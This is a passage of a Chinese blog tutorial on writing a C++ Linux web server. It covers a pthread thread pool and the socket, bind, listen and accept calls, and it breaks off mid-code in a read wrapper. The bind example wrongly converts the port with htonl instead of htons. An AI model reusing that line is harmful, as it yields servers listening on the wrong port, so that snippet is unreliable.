ThreadpoolTask task;</span><br><span class="line">    <span class="comment">// 对于子线程来说,事件循环开始</span></span><br><span class="line">    <span class="keyword">for</span>(;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 首先获取事件</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 获取事件时需要上个锁</span></span><br><span class="line">            <span class="function">MutexLockGuard <span class="title">guard</span><span class="params">(pool-&gt;threadpool_mutex_)</span></span>;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/** </span></span><br><span class="line"><span class="comment">             * 如果好不容易获得到锁了,但是没有事件可以执行</span></span><br><span class="line"><span class="comment">             * 则陷入沉睡,释放锁,并等待唤醒</span></span><br><span class="line"><span class="comment">             * <span class="doctag">NOTE:</span> 注意, pthread_cond_signal 会唤醒至少一个线程</span></span><br><span class="line"><span class="comment">             *       也就是说,可能存在被唤醒的线程仍然没有事件处理的情况</span></span><br><span class="line"><span class="comment">             *       这时只需循环wait即可.</span></span><br><span class="line"><span class="comment">             */</span> </span><br><span class="line">            <span class="keyword">while</span>(pool-&gt;task_queue_.<span class="built_in">size</span>() == <span class="number">0</span>)</span><br><span class="line">                pool-&gt;threadpool_cond_.<span class="built_in">wait</span>();</span><br><span class="line">            <span class="comment">// 唤醒后一定有事件</span></span><br><span class="line">            <span class="built_in">assert</span>(pool-&gt;task_queue_.<span class="built_in">size</span>() != <span class="number">0</span>);</span><br><span class="line">            task = pool-&gt;task_queue_.<span class="built_in">front</span>();</span><br><span class="line">            pool-&gt;task_queue_.<span class="built_in">pop</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 执行事件</span></span><br><span class="line">        (task.function)(task.arguments);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 注意: UNREACHABLE, 控制流不可能会到达此处</span></span><br><span class="line">    <span class="comment">// 因为线程的退出不会走这条控制流,而是执行退出事件</span></span><br><span class="line">    <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;TaskForWorkerThreads_ UNREACHABLE!&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-创建线程池">4. 创建线程池</h3><p>创建线程池较为简单，直接循环创建线程即可。</p><p>需要注意的是，这里设置了销毁线程池时的处理方式。具体信息将在下面<strong>销毁线程池</strong>的那部分中详细讲解。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">ThreadPool::<span class="built_in">ThreadPool</span>(<span class="type">size_t</span> threadNum, ShutdownMode shutdown_mode, <span class="type">size_t</span> maxQueueSize)</span><br><span class="line">        : <span class="built_in">threadNum_</span>(threadNum),</span><br><span class="line">          <span class="built_in">maxQueueSize_</span>(maxQueueSize), </span><br><span class="line">          <span class="comment">// 使用 类成员变量 threadpool_mutex_ 来初始化 threadpool_cond_</span></span><br><span class="line">          <span class="built_in">threadpool_cond_</span>(threadpool_mutex_), </span><br><span class="line">          <span class="built_in">shutdown_mode_</span>(shutdown_mode)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 开始循环创建线程 </span></span><br><span class="line">    <span class="keyword">while</span>(threads_.<span class="built_in">size</span>() &lt; threadNum_)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">pthread_t</span> thread;</span><br><span class="line">        <span class="comment">// 如果线程创建成功,则将其压入栈内存中</span></span><br><span class="line">        <span class="keyword">if</span>(!<span class="built_in">pthread_create</span>(&amp;thread, <span class="literal">nullptr</span>, TaskForWorkerThreads_, <span class="keyword">this</span>))</span><br><span class="line">        &#123;</span><br><span class="line">            threads_.<span class="built_in">push_back</span>(thread);</span><br><span class="line">            <span class="comment">// // 注意这里只修改已启动的线程数量</span></span><br><span class="line">            <span class="comment">// startedThreadNum_++;</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="5-添加事件">5. 添加事件</h3><p>添加新事件时，需要设置一下锁，防止脏读。在新事件添加完成后，使用条件变量来唤醒其中某一个空闲线程以执行新事件。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ThreadPool::appendTask</span><span class="params">(<span class="type">void</span> (*function)(<span class="type">void</span>*), <span class="type">void</span>* arguments)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 由于会操作事件队列,因此需要上锁</span></span><br><span class="line">    <span class="function">MutexLockGuard <span class="title">guard</span><span class="params">(threadpool_mutex_)</span></span>;</span><br><span class="line">    <span class="comment">// 如果队列长度过长,则将当前task丢弃</span></span><br><span class="line">    <span class="keyword">if</span>(task_queue_.<span class="built_in">size</span>() &gt; maxQueueSize_)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 添加task至列表中</span></span><br><span class="line">        ThreadpoolTask task = &#123; function, arguments &#125;;</span><br><span class="line">        task_queue_.<span class="built_in">push</span>(task);</span><br><span class="line">        <span class="comment">// 每当有新事件进入之时,只唤醒一个等待线程</span></span><br><span class="line">        threadpool_cond_.<span class="built_in">notify</span>();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="6-销毁线程池">6. 销毁线程池</h3><p>销毁线程池时，需要判断销毁的方式。</p><p>这里设置了两种销毁方式，分别是</p><ol><li><p>IMMEDIATE_SHUTDOWN</p></li><li><p>GRACEFUL_QUIT</p></li></ol><p>对于第一种销毁方式，线程池将马上清空事件队列中的全部事件，并添加与线程个数相对应量的<strong>退出事件</strong>。这将会使每个子线程在<strong>执行完当前事件后，马上执行退出事件</strong>以退出。</p><blockquote><p><strong>退出事件</strong>如下：每个线程简单执行 pthread_exit 以退出。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">auto</span> pthreadExit = [](<span class="type">void</span>*) &#123; <span class="built_in">pthread_exit</span>(<span class="number">0</span>); &#125;;</span><br></pre></td></tr></table></figure><p>而对于第二种销毁方式来说，只是简单的添加退出事件，没有额外的清空之前的事件。这样线程池只会在<strong>所有事件全部结束</strong>后才真正的被销毁。</p><p>以下是具体的实现代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">ThreadPool::~<span class="built_in">ThreadPool</span>()</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 向任务队列中添加退出线程事件,注意上锁</span></span><br><span class="line">    <span class="comment">// 注意在 cond 使用之前一定要上 mutex</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 操作 task_queue_ 时一定要上锁</span></span><br><span class="line">        <span class="function">MutexLockGuard <span class="title">guard</span><span class="params">(threadpool_mutex_)</span></span>;</span><br><span class="line">        <span class="comment">// 如果需要立即关闭当前的线程池,则</span></span><br><span class="line">        <span class="keyword">if</span>(shutdown_mode_ == IMMEDIATE_SHUTDOWN)</span><br><span class="line">            <span class="comment">// 先将当前队列清空</span></span><br><span class="line">            <span class="keyword">while</span>(!task_queue_.<span class="built_in">empty</span>())</span><br><span class="line">                task_queue_.<span class="built_in">pop</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 往任务队列中添加退出线程任务</span></span><br><span class="line">        <span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; threadNum_; i++)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">auto</span> pthreadExit = [](<span class="type">void</span>*) &#123; <span class="built_in">pthread_exit</span>(<span class="number">0</span>); &#125;;</span><br><span class="line">            ThreadpoolTask task = &#123; pthreadExit, <span class="literal">nullptr</span> &#125;;</span><br><span class="line">            task_queue_.<span class="built_in">push</span>(task);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 唤醒所有线程以执行退出操作</span></span><br><span class="line">        threadpool_cond_.<span class="built_in">notifyAll</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; threadNum_; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 回收线程资源</span></span><br><span class="line">        <span class="built_in">pthread_join</span>(threads_[i], <span class="literal">nullptr</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-参考链接">7. 参考链接</h3><ul><li><p><a href="https://github.com/linyacool/WebServer">linyacool/WebServer - github</a></p></li><li><p><a href="https://blog.csdn.net/qq_36359022/article/details/78796784">线程池原理及C语言实现线程池</a></p></li></ul><h2 id="三、网络连接">三、网络连接</h2><h3 id="1-概述-2">1. 概述</h3><p>执行一次完整的网络连接通常需要执行数个 <strong>socket 类</strong> 函数。</p><p>为了弄懂这些函数的使用，本人将在下面随着代码的编写，尽量讲解所使用到的函数内容。</p><p>注：以下部分主要参考自 <strong>Linux/Posix manual page</strong>（<code>man</code>指令真是一个好东西 XD）。</p><h3 id="2-socket">2. socket</h3><ul><li><p>socket 函数主要用于创建网络交互（communication）中的一个终端（endpoint），即创建一个 socket fd 文件描述符。</p></li><li><p>socket 函数的类型声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 执行成功则返回一个新文件描述符fd，失败则返回-1并设置errno</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">socket</span><span class="params">(<span class="type">int</span> domain, <span class="type">int</span> type, <span class="type">int</span> protocol)</span></span>;</span><br></pre></td></tr></table></figure><p>其中，对于参数 domain，我们主要用到以下两种类型:</p><ul><li>AF_UNIX / AF_LOCAL：本地通信，通常用于<strong>进程间通信</strong>。其通信不经过网卡，速度远远大于 AF_INET。</li><li>AF_INET： IPv4 协议通信，数据需要经过网卡。</li></ul><blockquote><p>IPv6 和 bluetooth 等类型暂且不表。比较诧异的是，AF_VSOCK用于虚拟机程序与宿主机进行通信。</p></blockquote><p>对于参数 type，常用的主要有以下几种：</p><ul><li><p>SOCK_STREAM： TCP 通信</p></li><li><p>SOCK_DGRAM： UDP 通信</p></li><li><p>SOCK_NONBLOCK： 设置非阻塞 socket。使用 or 运算符来附加属性</p><blockquote><p>与设置 O_NONBLOCK 至对应文件描述符操作<strong>等同</strong>。</p></blockquote></li><li><p>SOCK_CLOEXEC： 设置若当前程序执行 exec 时，对应文件描述符将在子进程中给关闭。使用 or 运算符来附加属性</p><blockquote><p>与设置 FD_CLOEXEC 至对应文件描述符等同。</p></blockquote></li></ul><p>参数 protocol 通常用于指定某一个特定的套接字协议。如果给定协议系列只有一个协议可以支持特定的套接字类型，则 protocol 可以指定为0。但是若给定协议系列中可能存在多个可以支持套接字的类型，这时候就必须设置 protocol 以指定具体类型。</p></li><li><p>简单举例：创建一个 IPv4 的 TCP 套接字（最常用）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> listen_fd = <span class="built_in">socket</span>(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br></pre></td></tr></table></figure></li></ul><h3 id="3-bind">3. bind</h3><ul><li><p>对于一个<strong>新创建</strong>的 socket（注意是<strong>新创建</strong>的），还没有任何的地址用于赋给该 socket。而 bind 函数就是用于赋以一个地址给该 socket。</p><p>需要注意的是：如果当前 socket 在执行 bind 前已经被使用，则<strong>操作系统将会自动分配地址以及端口号</strong>等等，这也是为什么一些网络程序向外通信时使用的端口号是随机的，因为操作系统会在后面调控。</p></li><li><p>bind 函数的声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 执行成功则返回0，失败则返回-1并设置errno</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">bind</span><span class="params">(<span class="type">int</span> sockfd, <span class="type">const</span> <span class="keyword">struct</span> sockaddr *addr, <span class="type">socklen_t</span> addrlen)</span></span>;</span><br></pre></td></tr></table></figure><ul><li><p>其中，<strong>第一个参数sockfd</strong> 用以传入目标 socket 文件描述符</p></li><li><p>至于<strong>第二个参数addr</strong>，其中使用的规则与结构体，在地址族之间有所不同。</p></li><li><p><strong>第三个参数addrlen</strong>用于表示<strong>第二个参数addr</strong>所指向结构体的size。</p></li></ul><p>对于 AF_INET：所使用到的 address format 如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;netinet/in.h&gt;</span> <span class="comment">// ! 注意头文件！！</span></span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sockaddr_in</span> &#123;</span><br><span class="line">    <span class="type">sa_family_t</span>    sin_family; <span class="comment">/* address family: AF_INET */</span></span><br><span class="line">    <span class="type">in_port_t</span>      sin_port;   <span class="comment">/* port in network byte order */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">in_addr</span> sin_addr;   <span class="comment">/* internet address */</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Internet address. */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">in_addr</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span>       s_addr;     <span class="comment">/* address in network byte order */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>其中，sin_family 始终为 AF_INET；sin_port 设置为目标端口；sin_addr用以保存<strong>监听目标的地址</strong>。</p><p>这里多提一句，由于现代计算机可能有多张网卡，因此指定 sin_addr 可以使得只监听特定网卡的连接。如果想监听<strong>全部网卡的连接</strong>，则可以使用宏定义 <strong>INADDR_ANY</strong>（实际上就是 0.0.0.0）。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Address to accept any incoming messages.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INADDR_ANY  ((in_addr_t) 0x00000000)</span></span><br></pre></td></tr></table></figure><p>而如果绑定 127.0.0.1 回环地址，则<strong>只能监听到主动发送至回环地址的请求</strong>，其他发送到当前该机器但目标IP非回环地址的请求则不会被处理。</p><blockquote><p>注意：sin_port、sin_addr 变量都必须以<strong>网络端序</strong>来保存数据（即大端序）。</p><p>socket提供了端序转换的一些函数，便于转换（其中，h表示host，n表示network）。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Functions to convert between host and network byte order.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Please note that these functions normally take `unsigned long int&#x27; or</span></span><br><span class="line"><span class="comment">`unsigned short int&#x27; values as arguments and also return them.  But</span></span><br><span class="line"><span class="comment">this was a short-sighted decision since on different systems the types</span></span><br><span class="line"><span class="comment">may have different representations but the values are always the same.  */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint32_t</span> <span class="title">ntohl</span> <span class="params">(<span class="type">uint32_t</span> __netlong)</span> __THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint16_t</span> <span class="title">ntohs</span> <span class="params">(<span class="type">uint16_t</span> __netshort)</span></span></span><br><span class="line"><span class="function">__THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint32_t</span> <span class="title">htonl</span> <span class="params">(<span class="type">uint32_t</span> __hostlong)</span></span></span><br><span class="line"><span class="function">__THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint16_t</span> <span class="title">htons</span> <span class="params">(<span class="type">uint16_t</span> __hostshort)</span></span></span><br><span class="line"><span class="function">__THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br></pre></td></tr></table></figure></blockquote></li></ul><blockquote><p>如果需要<strong>网络端序IP地址&lt;—&gt;字符串</strong>类型转变，则请参照以下函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;netinet/in.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">inet_aton</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *cp, <span class="keyword">struct</span> in_addr *inp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_addr</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *cp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_network</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *cp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">char</span> *<span class="title">inet_ntoa</span><span class="params">(<span class="keyword">struct</span> in_addr in)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">in_addr</span> <span class="built_in">inet_makeaddr</span>(<span class="type">in_addr_t</span> net, <span class="type">in_addr_t</span> host);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_lnaof</span><span class="params">(<span class="keyword">struct</span> in_addr in)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_netof</span><span class="params">(<span class="keyword">struct</span> in_addr in)</span></span>;</span><br></pre></td></tr></table></figure></blockquote><p>对于一个 AF_NET 地址族来说，执行 bind 的一个简单例子如下：</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 绑定端口</span></span><br><span class="line">sockaddr_in server_addr;</span><br><span class="line"><span class="comment">// 初始化一下</span></span><br><span class="line"><span class="built_in">memset</span>(&amp;server_addr, <span class="string">&#x27;\0&#x27;</span>, <span class="built_in">sizeof</span>(server_addr));</span><br><span class="line"><span class="comment">// 设置一下基本操作</span></span><br><span class="line">server_addr.sin_family = AF_INET;</span><br><span class="line">server_addr.sin_port = <span class="built_in">htonl</span>((<span class="type">unsigned</span> <span class="type">short</span>)port);</span><br><span class="line">server_addr.sin_addr.s_addr = <span class="built_in">htonl</span>(INADDR_ANY);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 试着bind</span></span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">bind</span>(listen_fd, (sockaddr*)&amp;server_addr, <span class="built_in">sizeof</span>(server_addr)) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br></pre></td></tr></table></figure><h3 id="4-listen">4. listen</h3><p>listen 函数将会使得传入的 socket fd 变为<strong>等待连接状态</strong>。该函数原型如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 成功则返回0，失败则返回-1并设置 errno</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">listen</span><span class="params">(<span class="type">int</span> sockfd, <span class="type">int</span> backlog)</span></span>;</span><br></pre></td></tr></table></figure><p>该函数主要有两个参数：参数 sockfd 传入目标 fd；backlog 指定最大<strong>挂起连接</strong>的等待队列长度，如果队列满了，则新连接将会被拒绝（ECONNREFUSED）。而对于某些特殊协议，将会在一段时间后重新发起连接。</p><h3 id="5-accept">5. accept</h3><ul><li><p>accept 函数将会取出 <strong>listen_fd的挂起连接等待队列</strong> 中的第一个连接，创建一个新的 socket fd（client fd），并将其返回。后续与该连接的交互都是通过该client fd 完成。</p></li><li><p>需要注意的是， accept 会从 listen_fd 中取出挂起的连接，并尝试连接。一旦完成连接后，将会创建一个新的 client_fd。<strong>原先的 listen_fd 不会有任何改变</strong>。</p></li><li><p>如果当前 listen_fd 为<strong>阻塞式</strong>的，则如果当前挂起连接等待队列中不存在任何连接，那么<strong>执行 accept 时将阻塞</strong>，直到有新连接的到来。</p></li><li><p>该函数的原型如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">accept</span><span class="params">(<span class="type">int</span> sockfd, <span class="keyword">struct</span> sockaddr *addr, <span class="type">socklen_t</span> *addrlen)</span></span>;</span><br></pre></td></tr></table></figure><ul><li>第一个参数为传入的监听socket listen_fd</li><li>第二个参数为指向 sockaddr 结构体的 一个指针，accept 函数将会把 <strong>远程 socket 的address</strong>写入目标结构体中</li><li>第三个参数是一个<strong>存放 sockaddr 结构体大小</strong>的指针。</li></ul></li></ul><h3 id="6-read-recv-write-send">6. read/recv &amp; write/send</h3><p>由于 read/recv &amp; write/send 操作涉及到<strong>阻塞与非阻塞式读写</strong>，因此我们需要额外对其做一些异常处理。</p><blockquote><p>需要注意的是，socket读写中，除了使用read/write以外，还可以使用专用于套接字通信的send/recv函数族等等。</p></blockquote><h4 id="a-错误码">a. 错误码</h4><p>该类函数中<strong>最常返回的错误</strong>为 <strong>EINTR</strong> 以及 <strong>EAGAIN</strong>，其他错误暂时忽略。其中：</p><ul><li><p><strong>EINTR</strong>：该错误常见于<strong>阻塞式</strong>的操作，提示当前操作被<strong>中断</strong>。</p><p>如果一个进程在一个慢系统调用中阻塞时，捕获到信号并执行完信号处理例程返回时，这个系统调用将<strong>不再被阻塞，而是被中断</strong>，返回 EINTR。</p><p>对于读写函数来说，当返回这类错误时，最常用的做法就是<strong>重新执行</strong>目标函数。</p></li><li><p><strong>EAGAIN</strong>：该错误常见于<strong>非阻塞式</strong>的操作，提示用户稍后再<strong>重新执行</strong>。</p><p>例如：</p><ul><li>当以<strong>非阻塞</strong>方式大量发送数据时，如果缓冲区爆满，则产生 Resource temporarily unavailable的错误（资源暂时不可用），并返回 EAGAIN。</li><li>当以<strong>非阻塞</strong>模式下读取数据，如果多次读取数据但没有数据可读，则此时不会阻塞等待数据，而是直接返回 EAGAIN</li></ul><p>对于 read 函数来说，由于数据取决于<strong>远程</strong>，因此当接收到 EAGAIN 时终止读取，直接返回；</p><p>但对于 write 函数来说，由于数据取决于<strong>当前服务器</strong>，因此可以继续循环写入，直至数据完全写入。</p></li></ul><p>对于 recv/send 函数来说，与 read/write 相比，将会额外多出部分专用于 socket 的错误码，例如 ECONNREFUSED、EPIPE 以及 ECONNRESET 等等。出于调试目的，在实现 读写函数的 wrapper时，将这两类读写函数全部集成在 wrapper中，并用一个bool参数来控制启用 read/write 还是 recv/send 函数。</p><h4 id="b-阻塞-非阻塞-读取">b. 阻塞/非阻塞 读取</h4><p>对于读取操作来说，阻塞读取和非阻塞读取又有所不同：</p><ul><li>当有数据到来时，阻塞和非阻塞的实现相同，都是读取数据并<strong>立即返回</strong>。</li><li>但是当没有数据到来时，由于非阻塞读取时会返回 EAGAIN 错误，因此可以<strong>立即返回</strong>；而阻塞读取此时就必须阻塞，直到数据到来才返回。</li></ul><p>在具体实现 读取操作的wrapper函数时，同样使用一个bool参数来控制是否是阻塞/非阻塞读取。</p><h4 id="c-返回值">c. 返回值</h4><p>read/recv &amp; write/send 函数的返回值</p><ul><li>若为负数则说明存在错误</li><li>若为0则说明<strong>连接中断</strong></li><li>若为正数则该数为成功读取/发送的字节数</li></ul><h4 id="d-最终实现的代码">d. 最终实现的代码</h4><p>综上所述，read/recv 函数重新实现的 wrapper 如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">readn</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span>*buf, <span class="type">size_t</span> len, <span class="type">bool</span> isBlock, <span class="type">bool</span> isRead)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 这里将 void* 转换成 char* 是为了在下面进行自增操作</span></span><br><span class="line">    <span class="type">char</span> *pos = (<span class="type">char</span>*)buf;</span><br><span class="line">    <span class="type">size_t</span> leftNum = len;</span><br><span class="line">    <span class="type">ssize_t</span> readNum = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span>(leftNum &gt; <span 